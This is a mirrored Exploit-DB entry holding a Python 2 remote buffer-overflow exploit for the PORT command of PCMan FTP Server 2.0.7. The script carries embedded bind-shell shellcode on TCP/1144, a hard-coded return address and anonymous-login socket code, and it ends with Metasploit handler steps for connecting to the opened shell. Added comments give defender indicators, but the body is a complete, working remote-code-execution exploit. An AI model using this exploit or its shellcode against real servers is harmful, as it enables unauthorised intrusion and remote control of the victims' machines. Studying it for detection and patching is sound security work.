PCMan FTP Server 2.0.7 – ‘PORT’ Remote Buffer Overflow

  • 作者: Pablo González
    日期: 2016-11-04
  • 类别:
    平台:
  • 来源:https://www.exploit-db.com/exploits/40714/
  • #!/usr/bin/env python
    #-*- coding: utf-8 -*-
    
    # Exploit Title: PCMan FTP Server 2.0 PORT Command BoF Exploit
    # Author: Pablo González
    # Date: 4/11/2016
    # Software: PCMan 2.0
    # Tested on: Windows XP Professional SP3 Spanish x86
    
    import socket
    
    # NOTE(review): this is Python 2 code (print statement, raw_input); the
    # statements below are kept byte-identical, only comments were added.
    #
    # Defender summary: the script logs in to an FTP server on TCP/21 as
    # "anonymous" and then sends a single PORT command whose argument is a
    # byte string of 2007 + 4 + 20 + len(sc) bytes (roughly 2.4 KB) instead
    # of the RFC 959 "h1,h2,h3,h4,p1,p2" form. That oversized PORT line is the
    # thing to alert on at the network layer; per the msfvenom comment below
    # the payload is a bind shell on TCP/1144, so an unexpected listener on
    # that port on the FTP host is the post-exploitation indicator. No patched
    # release is referenced on this page, so the server-side fix is to retire
    # or replace the service and to restrict which sources can reach port 21.
    
    print "Creating malicious input!"
    
    # Filler (0x41 == 'A') that overruns the PORT argument buffer; 2007 is the
    # author's offset for the tested build (see the "Tested on" header) and
    # is not expected to hold on other builds.
    junk = '\x41'*2007
    # The 4 bytes placed right after the filler, named `ret` by the author:
    # little-endian 0x7E3C56F7, attributed to User32.dll on the tested system,
    # so it is platform/build specific.
    ret="\xf7\x56\x3c\x7e"	#User32.dll 7E3C56F7
    # 20-byte NOP sled ahead of the payload.
    nops = '\x90'*20
    
    #msfvenom -p windows/shell_bind_tcp LPORT=1144 -b '\x0a\x00\x0d' -f c
    #put shellcode in variable 'sc'
    # The excluded bytes (0x0a, 0x00, 0x0d) are presumably the ones an FTP
    # command line cannot carry (NUL and CR/LF). The payload is the author's,
    # left unchanged and not analysed here.
    
    sc=("\xdb\xd6\xba\xd3\x95\x1b\xd0\xd9\x74\x24\xf4\x58\x2b\xc9\xb1"
    "\x53\x31\x50\x17\x83\xe8\xfc\x03\x83\x86\xf9\x25\xdf\x41\x7f"
    "\xc5\x1f\x92\xe0\x4f\xfa\xa3\x20\x2b\x8f\x94\x90\x3f\xdd\x18"
    "\x5a\x6d\xf5\xab\x2e\xba\xfa\x1c\x84\x9c\x35\x9c\xb5\xdd\x54"
    "\x1e\xc4\x31\xb6\x1f\x07\x44\xb7\x58\x7a\xa5\xe5\x31\xf0\x18"
    "\x19\x35\x4c\xa1\x92\x05\x40\xa1\x47\xdd\x63\x80\xd6\x55\x3a"
    "\x02\xd9\xba\x36\x0b\xc1\xdf\x73\xc5\x7a\x2b\x0f\xd4\xaa\x65"
    "\xf0\x7b\x93\x49\x03\x85\xd4\x6e\xfc\xf0\x2c\x8d\x81\x02\xeb"
    "\xef\x5d\x86\xef\x48\x15\x30\xcb\x69\xfa\xa7\x98\x66\xb7\xac"
    "\xc6\x6a\x46\x60\x7d\x96\xc3\x87\x51\x1e\x97\xa3\x75\x7a\x43"
    "\xcd\x2c\x26\x22\xf2\x2e\x89\x9b\x56\x25\x24\xcf\xea\x64\x21"
    "\x3c\xc7\x96\xb1\x2a\x50\xe5\x83\xf5\xca\x61\xa8\x7e\xd5\x76"
    "\xcf\x54\xa1\xe8\x2e\x57\xd2\x21\xf5\x03\x82\x59\xdc\x2b\x49"
    "\x99\xe1\xf9\xe4\x91\x44\x52\x1b\x5c\x36\x02\x9b\xce\xdf\x48"
    "\x14\x31\xff\x72\xfe\x5a\x68\x8f\x01\x60\x11\x06\xe7\x02\xf1"
    "\x4e\xbf\xba\x33\xb5\x08\x5d\x4b\x9f\x20\xc9\x04\xc9\xf7\xf6"
    "\x94\xdf\x5f\x60\x1f\x0c\x64\x91\x20\x19\xcc\xc6\xb7\xd7\x9d"
    "\xa5\x26\xe7\xb7\x5d\xca\x7a\x5c\x9d\x85\x66\xcb\xca\xc2\x59"
    "\x02\x9e\xfe\xc0\xbc\xbc\x02\x94\x87\x04\xd9\x65\x09\x85\xac"
    "\xd2\x2d\x95\x68\xda\x69\xc1\x24\x8d\x27\xbf\x82\x67\x86\x69"
    "\x5d\xdb\x40\xfd\x18\x17\x53\x7b\x25\x72\x25\x63\x94\x2b\x70"
    "\x9c\x19\xbc\x74\xe5\x47\x5c\x7a\x3c\xcc\x6c\x31\x1c\x65\xe5"
    "\x9c\xf5\x37\x68\x1f\x20\x7b\x95\x9c\xc0\x04\x62\xbc\xa1\x01"
    "\x2e\x7a\x5a\x78\x3f\xef\x5c\x2f\x40\x3a")
    
    # Full PORT argument, filler + ret + NOP sled + payload. Style note: the
    # name `buffer` shadows the Python 2 builtin of the same name.
    buffer= junk + ret + nops + sc
    
    s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    # Target address is read interactively and used without validation.
    ip = raw_input('Give me Remote IP Address:')
    # socket.connect() returns None, so `connect` is always None and is unused.
    connect=s.connect((ip,21))
    # Server greeting, echoed to the operator.
    banner = s.recv(1024)
    print banner
    # Anonymous login. Both replies are read and discarded, so the script does
    # not check that the login was accepted before sending PORT; on this page
    # the PORT handler is reached only after USER/PASS.
    s.send('USER anonymous\r\n')
    s.recv(1024)
    s.send('PASS\r\n')
    s.recv(1024)
    #Sending input PORT command (Exploitation is coming)
    # Note there is no space between "PORT" and the argument: the trigger is
    # one command line of roughly 2.4 KB ending in CRLF, which is what a
    # protocol-aware sensor should flag. No reply is read after this send, so
    # the script learns nothing about whether the server crashed.
    s.send('PORT' + buffer + '\r\n')
    s.close()
    
    #Metasploit exploit/multi/handler or nc <ip> <port> :D
    #
    # For exploit/multi/handler
    #
    # use exploit/multi/handler
    # set PAYLOAD windows/shell_bind_tcp
    # set RHOST <ip>
    # set LPORT 1144
    # exploit
    # ...
    # Got it!
    
    # Printed unconditionally; it is not an indicator that anything succeeded.
    print "Got it? :D"
    